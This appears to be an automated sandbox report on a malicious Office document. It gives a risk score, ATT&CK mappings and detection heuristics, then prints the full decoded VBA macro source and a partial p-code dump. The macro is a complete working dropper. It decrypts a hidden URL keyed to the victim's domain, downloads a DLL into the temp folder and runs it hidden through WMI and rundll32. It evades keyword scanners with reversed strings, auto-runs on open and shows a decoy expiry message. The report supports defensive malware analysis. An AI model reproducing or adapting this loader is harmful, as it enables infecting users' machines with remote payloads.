MALICIOUS
538
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1055.012 Process Hollowing
The sample is a malicious Office document containing obfuscated VBA macros. Critical heuristics indicate the VBA code attempts to download and write a file to disk, likely a second-stage payload, using HTTP and then execute it via CreateRemoteThread and WriteProcessMemory. The presence of an Auto_Open macro and the use of CreateObject and Shell functions further support this malicious intent. The specific malware family could not be confidently identified.
Heuristics 15
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREADReference to CreateRemoteThread API
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
dollop.Write ampleMacarons.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM")) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set objWMIService = GetObject(strGetObject) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
keyVar = UCase(Environ("USERDNSDOMAIN")) -
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34349 bytes |
SHA-256: a079740a3470f0b2d1e63108d66e0cf9afcfbc39714e08dd5839c6fe56ca8144 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const namePrefix = "oegaid"
Private Const nameSuffix = ".dll"
Private Const clOneMask = 16515072
Private Const clTwoMask = 258048
Private Const clThreeMask = 4032
Private Const clFourMask = 63
Private Const clHighMask = 16711680
Private Const clMidMask = 65280
Private Const clLowMask = 255
Private Const cl2Exp18 = 262144
Private Const cl2Exp12 = 4096
Private Const cl2Exp6 = 64
Private Const cl2Exp8 = 256
Private Const cl2Exp16 = 65536
Private crc32Table() As Long
Public Function Decode64(ByVal sString As String) As Byte()
Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
Dim lTemp As Long
sString = Replace(sString, vbCr, vbNullString)
sString = Replace(sString, vbLf, vbNullString)
lTemp = Len(sString) Mod 4
If lTemp Then
Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
End If
If InStrRev(sString, "==") Then
iPad = 2
ElseIf InStrRev(sString, "=") Then
iPad = 1
End If
For lTemp = 0 To 255
Select Case lTemp
Case 65 To 90
bTrans(lTemp) = lTemp - 65
Case 97 To 122
bTrans(lTemp) = lTemp - 71
Case 48 To 57
bTrans(lTemp) = lTemp + 4
Case 43
bTrans(lTemp) = 62
Case 47
bTrans(lTemp) = 63
End Select
Next lTemp
For lTemp = 0 To 63
lPowers6(lTemp) = lTemp * cl2Exp6
lPowers12(lTemp) = lTemp * cl2Exp12
lPowers18(lTemp) = lTemp * cl2Exp18
Next lTemp
bIn = StrConv(sString, vbFromUnicode)
ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
For lChar = 0 To UBound(bIn) Step 4
lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
lTemp = lQuad And clHighMask
bOut(lPos) = lTemp \ cl2Exp16
lTemp = lQuad And clMidMask
bOut(lPos + 1) = lTemp \ cl2Exp8
bOut(lPos + 2) = lQuad And clLowMask
lPos = lPos + 3
Next lChar
If iPad Then
ReDim Preserve bOut(UBound(bOut) - iPad)
End If
Decode64 = bOut
End Function
Function StringToBytes(ByVal str As Variant) As Byte()
Dim retVal() As Byte
Dim tmp() As String
Dim k As Integer
tmp = Split(StrConv(str, vbUnicode), vbNullChar)
k = UBound(tmp) - 1
ReDim Preserve retVal(k)
For i = 0 To (UBound(tmp) - 1)
retVal(i) = Asc(tmp(i))
Next
StringToBytes = retVal
End Function
Function BytesToString(bArray As Variant) As String
Dim i As Integer
For i = 0 To UBound(bArray)
BytesToString = BytesToString & Chr(bArray(i))
Next
End Function
Private Sub Class_initialize()
Dim dwPolynomial As Long
dwPolynomial = &HEDB88320
Dim i As Integer, j As Integer
ReDim crc32Table(256)
Dim dwCrc As Long
For i = 0 To 255
dwCrc = i
For j = 8 To 1 Step -1
If (dwCrc And 1) Then
dwCrc = ((dwCrc And &HFFFFFFFE) \ 2&) And &H7FFFFFFF
dwCrc = dwCrc Xor dwPolynomial
Else
dwCrc = ((dwCrc And &HFFFFFFFE) \ 2&) And &H7FFFFFFF
End If
Next j
crc32Table(i) = dwCrc
Next i
End Sub
Function CRC32(ByRef Buffer() As Byte) As Long
Class_initialize
Dim crc32Result As Long
crc32Result = &HFFFFFFFF
Dim i As Integer
Dim iLookup As Integer
For Each x In Buffer
iLookup = (crc32Result And &HFF) Xor x
crc32Result = ((crc32Result And &HFFFFFF00) \ &H100) _
And 16777215
crc32Result = crc32Result Xor crc32Table(iLookup)
Next
CRC32 = Not (crc32Result)
End Function
Function XorDecodeBytes(iKey As Variant, iMessage As Variant) As Byte()
Dim i, j, k, iKeyIndex As Integer
Dim iTmpKey() As Variant
Dim cfc As Integer
cfc = &HEE
Dim retVal() As Byte
k = UBound(iMessage)
ReDim retVal(k)
For i = 0 To UBound(iMessage)
retVal(i) = iMessage(i)
Next
For i = 0 To UBound(iMessage)
iKeyIndex = i Mod (UBound(iKey) + 1)
j = (iKey(iKeyIndex) Xor iMessage(i)) Xor cfc
cfc = iMessage(i)
retVal(i) = j
Next
XorDecodeBytes = retVal
End Function
Function Slice1DArray(ByRef source() As Byte, ByVal start As Integer, Optional ByVal toend As Integer = -1) As Byte()
Dim retVal() As Byte
Dim length As Integer
Dim i As Integer
If toend = -1 Then
length = UBound(source) - start
toend = UBound(source)
Else
length = toend - start
End If
ReDim retVal(length)
For i = start To toend
retVal(i - start) = source(i)
Next
Slice1DArray = retVal
End Function
Function XorDecryptAndVerifyCRC(ByRef iKey As Variant, iMessage As Variant) As Byte()
Dim candidate_bytes() As Byte
Dim sPlaintext As String
Dim bPlaintext() As Byte
Dim crcRecoveredValue As Long
Dim s As String
candidate_bytes = XorDecodeBytes(iKey, iMessage)
sPlaintext = BytesToString(candidate_bytes)
On Error GoTo Error
s = BytesToString(iKey)
i = InStr(sPlaintext, " ")
If i = 0 Then
GoTo Error
End If
s = Left(sPlaintext, i)
For j = 1 To Len(s) - 1
c = Mid(s, j, 1)
If InStr("-0123456789", c) = 0 Then
GoTo Error
End If
Next
crcRecoveredValue = CLng((Left(sPlaintext, i)))
bPlaintext = Slice1DArray(candidate_bytes, i)
x = CRC32(bPlaintext)
If crcRecoveredValue = CRC32(bPlaintext) Then
XorDecryptAndVerifyCRC = bPlaintext
Return
End If
Error:
End Function
Function ExpandDotString(ByVal sInput As String) As String()
Dim retVal() As String
Dim chunks() As String
Dim k, i As Integer
ReDim retVal(0)
retVal(0) = sInput
Dim current_chunk As String
Dim last_concat As String
k = 0
chunks = Split(sInput, ".")
last_concat = ""
For i = UBound(chunks) To LBound(chunks) Step -1
current_chunk = chunks(i)
If last_concat = "" Then
last_concat = current_chunk
k = k + 1
ReDim Preserve retVal(k)
retVal(k) = current_chunk
GoTo Loop1
Else
ReDim Preserve retVal(k + 2)
retVal(k + 1) = current_chunk
last_concat = current_chunk & "." & last_concat
retVal(k + 2) = last_concat
k = k + 2
End If
Loop1:
Next
ExpandDotString = retVal
End Function
Function TryAllKeys(ByVal sInput As String, ByRef sKeys As Variant) As Byte()
Dim candidates() As String
Dim c As Variant
candidates = ExpandDotString(sInput)
For Each k In sKeys
For Each c In candidates
'
TryAllKeys = XorDecryptAndVerifyCRC(StringToBytes(c), k)
If (Not Not TryAllKeys) <> 0 Then
Exit Function
End If
Next c
Next k
Err.Raise vbObjectError + 555, "TryAllkeys", "Master key not found :/"
End Function
Public Sub ReThrowError(ByRef objError As ErrObject)
' Raise
Err.Raise objError.Number, objError.source, objError.Description, objError.HelpFile, objError.HelpContext
End Sub
Sub RunMe()
Dim s, keyVar, sPlaintext As String
Dim masterKey As Variant
keyVar = UCase(Environ("USERDNSDOMAIN"))
Dim payload As String
payload = ""
Dim i As Integer
Dim keyScheduleBytes() As Variant
Dim myURL As String
Dim keySchedule(4) As String
keySchedule(0) = "kO2U8of+kuaH8Y3px7Hb6se30qbYuZn52vCC/Q=="
keySchedule(1) = "kOCW4Z78hfqN95b32qnX5sa5zbPWoon/0OeQ7A=="
keySchedule(2) = "kOyH+Zjkj/OT6Yjl1a/P4NKuzbPWrpjn1v+a5Q=="
keySchedule(3) = "kO2U8of+kuaH4538yrrB99Ow06zbu5nj1fSQ8Q=="
keySchedule(4) = "jv6f4ZL6j/+V75zly73X+Niwzb/QqIznyO2C/Q=="
payload = payload & "tbC04rWwsri8qaTi9OClreH5vai+ofm4/a2p6ejkv///5ra7t6mpqK6o4Oew"
payload = payload & "5+n2pqKi8Ly4vb+wqPz3ovPqraD2sKavseW57Kyk8//vqrW16769r7HAt8W5"
payload = payload & "iPPe9IP9s8C8nanVoN2/2ZHgy+me/7Lhvbyl"
ReDim keyScheduleBytes(UBound(keySchedule))
For i = 0 To UBound(keySchedule)
keyScheduleBytes(i) = Decode64(keySchedule(i))
Next
masterKey = TryAllKeys(keyVar, keyScheduleBytes)
ciphertext = Decode64(payload)
bPlaintext = XorDecryptAndVerifyCRC(masterKey, ciphertext)
sPlaintext = BytesToString(bPlaintext)
zzz = sPlaintext
Dim ampleMacarons
Dim bStrm
Dim filename
Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))
ampleMacarons.Open "GET", zzz, False
ampleMacarons.Send
Set dollop = CreateObject(StrReverse("maertS.bdodA"))
dollop.Type = 1
dollop.Open
dollop.Write ampleMacarons.responseBody
dstPath = Environ$("TEMP") & "\" & namePrefix & "_" & DateDiff("s", #1/1/1970#, Now()) & nameSuffix
savePath = dstPath
dollop.savetofile savePath, 2
Const HIDDEN_WINDOW = 0
strComputer = "."
abc = StrReverse("23lldnur") & " " & dstPath & ",Start"
strGetObject = StrReverse("2vmic\toor\.\\:stmgmniw")
Set objWMIService = GetObject(strGetObject)
Set objStartup = objWMIService.Get(StrReverse("putratSssecorP_23niW"))
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(strGetObject & StrReverse("ssecorP_23niW:"))
objProcess.Create abc, Null, objConfig, intProcessID
MsgBox ("This document has expired. Please contact the sender.")
End Sub
Sub AutoOpen()
RunMe
End Sub
Attribute VB_Name = "NewMacros"
' Processing file: /tmp/qstore_kvv_xoyp
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 31481 bytes
' Line #0:
' Dim (Private Const)
' LitStr 0x0006 "oegaid"
' VarDefn _B_var_Print
' Line #1:
' Dim (Private Const)
' LitStr 0x0004 ".dll"
' VarDefn namePrefix
' Line #2:
' Line #3:
' Dim (Private Const)
' LitDI4 0x0000 0x00FC
' VarDefn nameSuffix
' Line #4:
' Dim (Private Const)
' LitDI4 0xF000 0x0003
' VarDefn clOneMask
' Line #5:
' Dim (Private Const)
' LitDI2 0x0FC0
' VarDefn clTwoMask
' Line #6:
' Dim (Private Const)
' LitDI2 0x003F
' VarDefn clThreeMask
' Line #7:
' Line #8:
' Dim (Private Const)
' LitDI4 0x0000 0x00FF
' VarDefn clFourMask
' Line #9:
' Dim (Private Const)
' LitDI4 0xFF00 0x0000
' VarDefn clHighMask
' Line #10:
' Dim (Private Const)
' LitDI2 0x00FF
' VarDefn clMidMask
' Line #11:
' Line #12:
' Dim (Private Const)
' LitDI4 0x0000 0x0004
' VarDefn clLowMask
' Line #13:
' Dim (Private Const)
' LitDI2 0x1000
' VarDefn cl2Exp18
' Line #14:
' Dim (Private Const)
' LitDI2 0x0040
' VarDefn cl2Exp12
' Line #15:
' Dim (Private Const)
' LitDI2 0x0100
' VarDefn cl2Exp6
' Line #16:
' Dim (Private Const)
' LitDI4 0x0000 0x0001
' VarDefn cl2Exp8
' Line #17:
' Line #18:
' Dim (Private)
' VarDefn cl2Exp16
' Line #19:
' Line #20:
' Line #21:
' FuncDefn (Public Function crc32Table(ByVal Decode64 As String) As Append)
' Line #22:
' Line #23:
' Dim
' VarDefn sString
' VarDefn bOut
' OptionBase
' LitDI2 0x00FF
' VarDefn bIn
' OptionBase
' LitDI2 0x003F
' VarDefn bTrans
' OptionBase
' LitDI2 0x003F
' VarDefn lPowers6
' Line #24:
' Dim
' OptionBase
' LitDI2 0x003F
' VarDefn lPowers12
' VarDefn lPowers18 (As Long)
' VarDefn lQuad (As Integer)
' VarDefn iPad (As Long)
' VarDefn lChar (As Long)
' VarDefn lPos (As String)
' Line #25:
' Dim
' VarDefn sOut (As Long)
' Line #26:
' Line #27:
' Ld Decode64
' Ld lTemp
' Ld vbNullString
' ArgsLd Replace 0x0003
' St Decode64
' Line #28:
' Ld Decode64
' Ld nodeTypedValue
' Ld vbNullString
' ArgsLd Replace 0x0003
' St Decode64
' Line #29:
' Line #30:
' Ld Decode64
' FnLen
' LitDI2 0x0004
' Mod
' St sOut
' Line #31:
' Ld sOut
' IfBlock
' Line #32:
' Ld Raise
' LitStr 0x0008 "MyDecode"
' LitStr 0x0021 "Input string is not valid Base64."
' Ld vbCr
' ArgsMemCall (Call) Err 0x0003
' Line #33:
' EndIfBlock
' Line #34:
' Line #35:
' Ld Decode64
' LitStr 0x0002 "=="
' ArgsLd vbObjectError 0x0002
' IfBlock
' Line #36:
' LitDI2 0x0002
' St lQuad
' Line #37:
' Ld Decode64
' LitStr 0x0001 "="
' ArgsLd vbObjectError 0x0002
' ElseIfBlock
' Line #38:
' LitDI2 0x0001
' St lQuad
' Line #39:
' EndIfBlock
' Line #40:
' Line #41:
' StartForVariable
' Ld sOut
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x00FF
' For
' Line #42:
' Ld sOut
' SelectCase
' Line #43:
' LitDI2 0x0041
' LitDI2 0x005A
' CaseTo
' CaseDone
' Line #44:
' Ld sOut
' LitDI2 0x0041
' Sub
' Ld sOut
' ArgsSt bIn 0x0001
' Line #45:
' LitDI2 0x0061
' LitDI2 0x007A
' CaseTo
' CaseDone
' Line #46:
' Ld sOut
' LitDI2 0x0047
' Sub
' Ld sOut
' ArgsSt bIn 0x0001
' Line #47:
' LitDI2 0x0030
' LitDI2 0x0039
' CaseTo
' CaseDone
' Line #48:
' Ld sOut
' LitDI2 0x0004
' Add
' Ld sOut
' ArgsSt bIn 0x0001
' Line #49:
' LitDI2 0x002B
' Case
' CaseDone
' Line #50:
' LitDI2 0x003E
' Ld sOut
' ArgsSt bIn 0x0001
' Line #51:
' LitDI2 0x002F
' Case
' CaseDone
' Line #52:
' LitDI2 0x003F
' Ld sOut
' ArgsSt bIn 0x0001
' Line #53:
' EndSelect
' Line #54:
' StartForVariable
' Ld sOut
' EndForVariable
' NextVar
' Line #55:
' Line #56:
' StartForVariable
' Ld sOut
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x003F
' For
' Line #57:
' Ld sOut
' Ld cl2Exp12
' Mul
' Ld sOut
' ArgsSt bTrans 0x0001
' Line #58:
' Ld sOut
' Ld cl2Exp18
' Mul
' Ld sOut
' ArgsSt lPowers6 0x0001
' Line #59:
' Ld sOut
' Ld clLowMask
' Mul
' Ld sOut
' ArgsSt lPowers12 0x0001
' Line #60:
' StartForVariable
' Ld sOut
' EndForVariable
' NextVar
' Line #61:
' Line #62:
' Ld Decode64
' Ld InStrRev
' ArgsLd TransformFinalBlock 0x0002
' St bOut
' Line #63:
' OptionBase
' Ld bOut
' FnUBound 0x0000
' LitDI2 0x0001
' Add
' Paren
' LitDI2 0x0004
' IDiv
' Paren
' LitDI2 0x0003
' Mul
' Paren
' LitDI2 0x0001
' Sub
' Redim sString 0x0001 (As Variant)
' Line #64:
' Line #65:
' StartForVariable
' Ld iPad
' EndForVariable
' LitDI2 0x0000
' Ld bOut
' FnUBound 0x0000
' LitDI2 0x0004
' ForStep
' Line #66:
' LineCont 0x0004 1A 00 10 00
' Ld iPad
' ArgsLd bOut 0x0001
' ArgsLd bIn 0x0001
' ArgsLd lPowers12 0x0001
' Ld iPad
' LitDI2 0x0001
' Add
' ArgsLd bOut 0x0001
' ArgsLd bIn 0x0001
' ArgsLd lPowers6 0x0001
' Add
' Ld iPad
' LitDI2 0x0002
' Add
' ArgsLd bOut 0x0001
' ArgsLd bIn 0x0001
' ArgsLd bTrans 0x0001
' Add
' Ld iPad
' LitDI2 0x0003
' Add
' ArgsLd bOut 0x0001
' ArgsLd bIn 0x0001
' Add
' St lPowers18
' Line #67:
' Ld lPowers18
' Ld clFourMask
' And
' St sOut
' Line #68:
' Ld sOut
' Ld cl2Exp8
' IDiv
' Ld lChar
' ArgsSt sString 0x0001
' Line #69:
' Ld lPowers18
' Ld clHighMask
' And
' St sOut
' Line #70:
' Ld sOut
' Ld cl2Exp6
' IDiv
' Ld lChar
' LitDI2 0x0001
' Add
' ArgsSt sString 0x0001
' Line #71:
' Ld lPowers18
' Ld clMidMask
' And
' Ld lChar
' LitDI2 0x0002
' Add
' ArgsSt sString 0x0001
' Line #72:
' Ld lChar
' LitDI2 0x0003
' Add
' St lChar
' Line #73:
' StartForVariable
' Ld iPad
' EndForVariable
' NextVar
' Line #74:
' Ld lQuad
' IfBlock
' Line #75:
' OptionBase
' Ld sString
' FnUBound 0x0000
' Ld lQuad
' Sub
' Redim (Preserve) sString 0x0001 (As Variant)
' Line #76:
' EndIfBlock
' Line #77:
' Ld sString
' St crc32Table
' Line #78:
' Line #79:
' EndFunc
' Line #80:
' Line #81:
' Line #82:
' FuncDefn (Function vbFromUnicode(ByVal StringToBytes As Variant) As Append)
' Line #83:
' Dim
' VarDefn str
' Line #84:
' Dim
' VarDefn retVal
' Line #85:
' Dim
' VarDefn tmp (As Integer)
' Line #86:
' Ld StringToBytes
' Ld StrConv
' ArgsLd TransformFinalBlock 0x0002
' Ld k
' ArgsLd Split 0x0002
' St retVal
' Line #87:
' Ld retVal
' FnUBound 0x0000
' LitDI2 0x0001
' Sub
' St tmp
' Line #88:
' OptionBase
' Ld tmp
' Redim (Preserve) str 0x0001 (As Variant)
' Line #89:
' StartForVariable
' Ld CreateDecryptor
' EndForVariable
' LitDI2 0x0000
' Ld retVal
' FnUBound 0x0000
' LitDI2 0x0001
' Sub
' Paren
' For
' Line #90:
' Ld CreateDecryptor
' ArgsLd retVal 0x0001
' ArgsLd vbNullChar 0x0001
' Ld CreateDecryptor
' ArgsSt str 0x0001
' Line #91:
' StartForVariable
' Next
' Line #92:
' Ld str
' St vbFromUnicode
' Line #93:
' EndFunc
' Line #94:
' Line #95:
' Line #96:
' FuncDefn (Function Asc(BytesToString As Variant) As String)
' Line #97:
' Dim
' VarDefn CreateDecryptor (As Integer)
' Line #98:
' StartForVariable
' Ld CreateDecryptor
' EndForVariable
' LitDI2 0x0000
' Ld BytesToString
' FnUBound 0x0000
' For
' Line #99:
' Ld Asc
' Ld CreateDecryptor
' ArgsLd BytesToString 0x0001
' ArgsLd Chr 0x0001
' Concat
' St Asc
' Line #100:
' StartForVariable
' Next
' Line #101:
' EndFunc
' Line #102:
' Line #103:
' Line #104:
' Line #105:
' FuncDefn (Sub bArray())
' Line #106:
' Line #107:
' Line #108:
' Dim
' VarDefn Class_initialize (As Long)
' Line #109:
' LitHI4 0x8320 0xEDB8
' St Class_initialize
' Line #110:
' Dim
' VarDefn CreateDecryptor (As Integer)
' VarDefn dwPolynomial (As Integer)
' Line #111:
' Line #112:
' OptionBase
' LitDI2 0x0100
' Redim cl2Exp16 0x0001 (As Variant)
' Line #113:
' Dim
' VarDefn j (As Long)
' Line #114:
' Line #115:
' StartForVariable
' Ld CreateDecryptor
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x00FF
' For
' Line #116:
' Ld CreateDecryptor
' St j
' Line #117:
' StartForVariable
' Ld dwPolynomial
' EndForVariable
' LitDI2 0x0008
' LitDI2 0x0001
' LitDI2 0x0001
' UMi
' ForStep
' Line #118:
' Ld j
' LitDI2 0x0001
' And
' Paren
' IfBlock
' Line #119:
' Ld j
' LitHI4 0xFFFE 0xFFFF
' And
' Paren
' LitDI4 0x0002 0x0000
' IDiv
' Paren
' LitHI4 0xFFFF 0x7FFF
' And
' St j
' Line #120:
' Ld j
' Ld Class_initialize
' Xor
' St j
' Line #121:
' ElseBlock
' Line #122:
' Ld j
' LitHI4 0xFFFE 0xFFFF
' And
' Paren
' LitDI4 0x0002 0x0000
' IDiv
' Paren
' LitHI4 0xFFFF 0x7FFF
' And
' St j
' Line #123:
' EndIfBlock
' Line #124:
' StartForVariable
' Ld dwPolynomial
' EndForVariable
' NextVar
' Line #125:
' Ld j
' Ld CreateDecryptor
' ArgsSt cl2Exp16 0x0001
' Line #126:
' StartForVariable
' Ld CreateDecryptor
' EndForVariable
' NextVar
' Line #127:
' Line #128:
' EndSub
' Line #129:
' Line #130:
' FuncDefn (Function dwCrc(ByRef CRC32 As ) As Long)
' Line #131:
' ArgsCall bArray 0x0000
' Line #132:
' Line #133:
' Dim
' VarDefn Buffer (As Long)
' Line #134:
' LitHI4 0xFFFF 0xFFFF
' St Buffer
' Line #135:
' Line #136:
' Dim
' VarDefn CreateDecryptor (As Integer)
' Line #137:
' Dim
' VarDefn crc32Result (As Integer)
' Line #138:
' Line #139:
' StartForVariable
' Ld iLookup
' EndForVariable
' Ld CRC32
' ForEach
' Line #140:
' Line #141:
' Ld Buffer
' LitHI2 0x00FF
' And
' Paren
' Ld iLookup
' Xor
' St crc32Result
' Line #142:
' LineCont 0x0004 0B 00 0A 00
' Ld Buffer
' LitHI4 0xFF00 0xFFFF
' And
' Paren
' LitHI2 0x0100
' IDiv
' Paren
' LitDI4 0xFFFF 0x00FF
' And
' St Buffer
' Line #143:
' Ld Buffer
' Ld crc32Result
' ArgsLd cl2Exp16 0x0001
' Xor
' St Buffer
' Line #144:
' Line #145:
' StartForVariable
' Next
' Line #146:
' Line #147:
' Ld Buffer
' Paren
' Not
' St dwCrc
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.